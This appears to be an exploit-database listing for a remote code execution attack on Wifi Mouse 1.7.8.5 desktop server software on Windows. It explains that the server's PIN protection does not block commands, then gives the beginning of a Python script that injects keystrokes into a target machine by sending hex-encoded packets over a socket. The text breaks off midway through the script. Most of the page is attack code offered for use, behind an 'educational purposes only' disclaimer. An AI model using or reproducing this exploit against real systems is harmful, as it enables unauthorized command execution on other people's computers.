Exploits / Vulnerability Discovered : 2021-03-01 |
Type : remote |
Platform : windows
This exploit / vulnerability Wifi mouse 1.7.8.5 remote code execution is for educational purposes only and if it is used you will do on your own risk!
# Desktop Server software used by mobile app has PIN option which does not to prevent command input.
# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.
#!/usr/bin/python
from socket import socket, AF_INET, SOCK_STREAM
from time import sleep
import sys
import string
def SendString(string):
for char in string:
target.sendto(("7574663820" + characters[char] + "0a").decode("hex"),(rhost,port)) # Sends Character hex with packet padding
sleep(0.03)
def SendReturn():
target.sendto("6b657920203352544e".decode("hex"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app
sleep(0.5)